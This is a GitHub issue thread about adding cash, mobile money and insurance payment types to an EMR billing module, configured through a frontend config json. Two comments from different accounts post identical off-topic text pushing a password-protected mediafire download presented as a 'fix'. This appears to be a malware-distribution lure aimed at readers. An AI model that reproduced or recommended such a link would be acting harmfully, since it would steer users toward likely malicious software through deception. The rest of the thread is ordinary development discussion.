### ISSUE TITLE
Add payment types in billing module

### ISSUE THREAD

**Issue by michaelbontyes** [MadiroGlobalHealth/UVL-EMR#10]
Add payement types: 

- Cash
- Mobile money
- Insurance

![Image](https://github.com/user-attachments/assets/7a47c1e5-0e07-4592-a784-81479d287eb0)

Configuration can be done through frontend config json.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by michaelbontyes** [comment]
Adding where the paiement method concept UUID is set in the UI:

![Image](https://github.com/user-attachments/assets/bd278bfb-47a6-4fab-ba64-6cfe02bc12b4)

**Comment by michaelbontyes** [comment]
Hi @caitlinmac , how are you doing with the billing types?

**Comment by caitlinmac** [comment]
I've created the concept paymentMethods with the billing types specified (including using the 'Cash' concept you created in our demo!) 

![Pasted image 20240917152701](https://github.com/user-attachments/assets/55545e0a-413c-4d36-a3e5-846e15a0c398)

**Comment by caitlinmac** [comment]
Having some issues viewing the ui locally to see the impact of the local changes I'm making to the frontend-config json file - I've posted in the slack channel to get help from the team!

**Comment by caitlinmac** [comment]
fixed issues running ui on localhost - have updated local config file with concept uuid but not seeing changes in the ui on localhost
![Screenshot 2024-09-26 at 7 02 06 PM](https://github.com/user-attachments/assets/8acf66db-1022-41bd-bfb0-dc5d7bdc76b6)
